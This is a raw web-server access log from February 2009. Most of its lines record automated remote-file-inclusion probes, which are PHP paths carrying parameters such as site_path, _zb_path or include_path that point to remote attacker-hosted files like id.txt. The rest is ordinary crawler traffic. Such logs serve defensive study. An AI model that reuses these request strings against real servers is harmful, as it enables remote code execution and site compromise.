148.245.102.115 - - [07/Feb/2009:00:57:18 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://vacarecords.com/anyinventory/admin/win.id.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
84.21.71.133 - - [07/Feb/2009:01:23:16 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.21.71.133 - - [07/Feb/2009:01:23:16 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wycom.co.kr/board/readme.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.189.224.21 - - [07/Feb/2009:01:28:50 -0600] "GET //config/dbutil.bck.php?confdir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
213.189.224.21 - - [07/Feb/2009:01:28:50 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.189.224.21 - - [07/Feb/2009:01:28:50 -0600] "GET /logs/access_log.1232928000//config/dbutil.bck.php?confdir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.3.139.15 - - [07/Feb/2009:01:30:23 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [07/Feb/2009:01:30:23 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [07/Feb/2009:01:30:23 -0600] "GET /logs/access_log.1232928000//include/admin.lib.inc.php?site_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.3.139.15 - - [07/Feb/2009:01:33:27 -0600] "GET /logs/access_log.1232582400//include/admin.lib.inc.php?site_path=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.172.144.67 - - [07/Feb/2009:02:09:52 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
83.172.144.67 - - [07/Feb/2009:02:09:52 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.67.238.184 - - [07/Feb/2009:02:12:24 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://culinaria.mamenb.net/tools.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
216.67.238.184 - - [07/Feb/2009:02:12:25 -0600] "GET //include/admin.lib.inc.php?site_path=http://culinaria.mamenb.net/tools.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
65.55.208.132 - - [07/Feb/2009:02:16:00 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [07/Feb/2009:02:16:01 -0600] "GET /logs/access_log.1169510400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [07/Feb/2009:02:16:06 -0600] "GET /logs/access_log.1172448000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.98.1.194 - - [07/Feb/2009:02:32:12 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
208.98.1.194 - - [07/Feb/2009:02:32:12 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.98.1.194 - - [07/Feb/2009:02:32:12 -0600] "GET /logs/access_log.1231718400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
208.98.1.194 - - [07/Feb/2009:02:33:37 -0600] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
80.172.224.171 - - [07/Feb/2009:02:44:43 -0600] "GET /logs//include/footer.php?_path[counter]=http://kness.us/.bash_history?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
80.172.224.171 - - [07/Feb/2009:02:44:43 -0600] "GET //include/footer.php?_path[counter]=http://kness.us/.bash_history?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
65.55.208.137 - - [07/Feb/2009:03:44:52 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [07/Feb/2009:03:44:52 -0600] "GET /logs/access_log.1225929600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [07/Feb/2009:04:01:11 -0600] "GET /?N=D HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [07/Feb/2009:04:05:13 -0600] "GET /logs/access_log.1193011200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.75.209.39 - - [07/Feb/2009:04:17:29 -0600] "GET /logs//modules/xoopspartners/init_basic.php?GALLERY_BASEDIR=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.75.209.39 - - [07/Feb/2009:04:17:29 -0600] "GET //modules/xoopspartners/init_basic.php?GALLERY_BASEDIR=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.75.209.39 - - [07/Feb/2009:04:17:29 -0600] "GET /logs/access_log.1227916800//modules/xoopspartners/init_basic.php?GALLERY_BASEDIR=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.189.224.21 - - [07/Feb/2009:04:21:19 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.189.224.21 - - [07/Feb/2009:04:21:19 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.189.224.21 - - [07/Feb/2009:04:21:19 -0600] "GET /logs/access_log.1227916800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
209.160.42.100 - - [07/Feb/2009:04:26:42 -0600] "GET /logs/errors.php?error=http://carina.lukas-consulting.at/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.64"
209.160.42.100 - - [07/Feb/2009:04:26:43 -0600] "GET /errors.php?error=http://carina.lukas-consulting.at/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.64"
208.111.154.16 - - [07/Feb/2009:04:38:48 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [07/Feb/2009:04:38:48 -0600] "GET /_vti_cnf?M=A HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [07/Feb/2009:04:38:49 -0600] "GET /_vti_cnf/?M=A HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
65.55.208.124 - - [07/Feb/2009:04:57:16 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Feb/2009:04:57:16 -0600] "GET /logs/access_log.1201219200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Feb/2009:04:57:16 -0600] "GET /logs/access_log.1111017600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Feb/2009:04:57:16 -0600] "GET /logs/access_log.1160006400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Feb/2009:04:57:17 -0600] "GET /logs/access_log.1150156800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Feb/2009:04:57:17 -0600] "GET /logs/access_log.1163116800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [07/Feb/2009:04:57:17 -0600] "GET /logs/access_log.1211587200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
77.221.151.34 - - [07/Feb/2009:04:58:27 -0600] "GET /logs/?_zb_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 177104 "-""libwww-perl/5.803"
77.221.151.34 - - [07/Feb/2009:04:58:27 -0600] "GET /?_zb_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
65.55.208.132 - - [07/Feb/2009:05:08:40 -0600] "GET /logs/access_log.1166140800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [07/Feb/2009:05:08:40 -0600] "GET /logs/access_log.1167350400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.111.154.16 - - [07/Feb/2009:05:21:28 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [07/Feb/2009:05:21:28 -0600] "GET /_vti_cnf?N=D HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [07/Feb/2009:05:21:29 -0600] "GET /_vti_cnf/?N=D HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
213.136.106.214 - - [07/Feb/2009:05:32:29 -0600] "GET /logs/errors.php?error=http://culinaria.mamenb.net/tools.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
213.136.106.214 - - [07/Feb/2009:05:32:31 -0600] "GET /errors.php?error=http://culinaria.mamenb.net/tools.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
77.221.130.2 - - [07/Feb/2009:05:44:50 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.2 - - [07/Feb/2009:05:44:50 -0600] "GET /logs/access_log.1229990400//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.2 - - [07/Feb/2009:05:44:51 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.2 - - [07/Feb/2009:05:44:55 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.2 - - [07/Feb/2009:05:46:09 -0600] "GET /logs/access_log.1230508800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
77.221.130.2 - - [07/Feb/2009:05:46:09 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
77.221.130.2 - - [07/Feb/2009:05:46:10 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
77.221.130.2 - - [07/Feb/2009:05:46:18 -0600] "GET /logs/access_log.1229990400//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
77.221.130.2 - - [07/Feb/2009:05:46:33 -0600] "GET /logs/access_log.1230508800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
77.221.130.2 - - [07/Feb/2009:05:46:33 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 301 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
77.221.130.2 - - [07/Feb/2009:05:46:33 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 306 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
77.221.130.2 - - [07/Feb/2009:05:46:42 -0600] "GET /logs/access_log.1229990400//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 328 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
194.149.234.21 - - [07/Feb/2009:05:53:10 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
194.149.234.21 - - [07/Feb/2009:05:53:10 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
194.149.234.21 - - [07/Feb/2009:05:53:11 -0600] "GET /logs/access_log.1227312000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
58.227.193.198 - - [07/Feb/2009:05:57:36 -0600] "GET /logs//include/footer.php?_path[counter]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
58.227.193.198 - - [07/Feb/2009:05:57:36 -0600] "GET //include/footer.php?_path[counter]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
58.227.193.198 - - [07/Feb/2009:05:57:36 -0600] "GET /logs/access_log.1228608000//include/footer.php?_path[counter]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
58.227.193.198 - - [07/Feb/2009:05:57:36 -0600] "GET /logs/access_log.1227830400//include/footer.php?_path[counter]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
58.227.193.198 - - [07/Feb/2009:06:09:07 -0600] "GET /logs/access_log.1228953600//include/footer.php?_path[counter]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
58.227.193.198 - - [07/Feb/2009:06:09:08 -0600] "GET /logs/access_log.1228867200//include/footer.php?_path[counter]=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
219.85.63.226 - - [07/Feb/2009:06:16:02 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:16:05 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:18:15 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:18:15 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:19:05 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:19:06 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:19:20 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:19:20 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:21:11 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:21:11 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.232.66.107 - - [07/Feb/2009:06:22:20 -0600] "GET //include/bbs.lib.inc.php?site_path=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.232.66.107 - - [07/Feb/2009:06:22:20 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Feb/2009:06:23:14 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.ativalicitacoes.com.br/templates/java/chid.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.221.240.132 - - [07/Feb/2009:06:25:46 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/aid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.221.240.132 - - [07/Feb/2009:06:25:47 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/aid.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
211.105.96.41 - - [07/Feb/2009:06:27:54 -0600] "GET /logs/access_log.1228608000/?_zb_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.105.96.41 - - [07/Feb/2009:06:27:54 -0600] "GET /?_zb_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.105.96.41 - - [07/Feb/2009:06:27:56 -0600] "GET /logs/?_zb_path=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 200 177104 "-""Mozilla/5.0"
148.245.102.115 - - [07/Feb/2009:06:28:09 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://vacarecords.com/anyinventory/admin/win.id.txt?%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
148.245.102.115 - - [07/Feb/2009:06:28:09 -0600] "GET //include/bbs.lib.inc.php?site_path=http://vacarecords.com/anyinventory/admin/win.id.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.101.4.49 - - [07/Feb/2009:06:31:04 -0600] "GET //?base_folder=http://jense.biz/info.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Feb/2009:06:31:05 -0600] "GET /logs//?base_folder=http://jense.biz/info.txt???? HTTP/1.1" 200 177109 "-""libwww-perl/5.79"
84.21.71.133 - - [07/Feb/2009:06:33:13 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
84.21.71.133 - - [07/Feb/2009:06:33:13 -0600] "GET //include/bbs.lib.inc.php?site_path=http://vacarecords.com/anyinventory/admin/win.id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
70.85.201.66 - - [07/Feb/2009:06:38:52 -0600] "GET /logs///errors.php?error=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
70.85.201.66 - - [07/Feb/2009:06:38:52 -0600] "GET ///errors.php?error=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
59.120.13.70 - - [07/Feb/2009:06:53:34 -0600] "GET /logs//booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.75.209.39 - - [07/Feb/2009:06:53:35 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.75.209.39 - - [07/Feb/2009:06:53:35 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.75.209.39 - - [07/Feb/2009:06:53:35 -0600] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.120.13.70 - - [07/Feb/2009:06:53:35 -0600] "GET //booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.75.209.39 - - [07/Feb/2009:06:53:39 -0600] "GET /logs/access_log.1228867200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.120.13.70 - - [07/Feb/2009:06:55:05 -0600] "GET /logs//booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
59.120.13.70 - - [07/Feb/2009:06:55:08 -0600] "GET //booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.75.209.39 - - [07/Feb/2009:07:11:05 -0600] "GET /logs/access_log.1229990400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.120.13.70 - - [07/Feb/2009:07:14:05 -0600] "GET /logs//booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
59.120.13.70 - - [07/Feb/2009:07:14:05 -0600] "GET /logs//booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
59.120.13.70 - - [07/Feb/2009:07:14:06 -0600] "GET //booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
59.120.13.70 - - [07/Feb/2009:07:14:07 -0600] "GET //booth.php?include_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
208.98.1.194 - - [07/Feb/2009:07:28:04 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.98.1.194 - - [07/Feb/2009:07:28:04 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.98.1.194 - - [07/Feb/2009:07:28:05 -0600] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.98.1.194 - - [07/Feb/2009:07:28:15 -0600] "GET /logs/access_log.1228435200//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.53.121.130 - - [07/Feb/2009:07:43:20 -0600] "GET /logs/access_log.1229040000//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.charityauction.co.za/includes/idrose.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.121.130 - - [07/Feb/2009:07:43:20 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.charityauction.co.za/includes/idrose.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.121.130 - - [07/Feb/2009:07:43:20 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.charityauction.co.za/includes/idrose.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.121.130 - - [07/Feb/2009:07:44:17 -0600] "GET /logs/access_log.1229126400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.charityauction.co.za/includes/idrose.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.220.16.179 - - [07/Feb/2009:07:44:19 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.cinepopbrasil.com.br/sistem.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
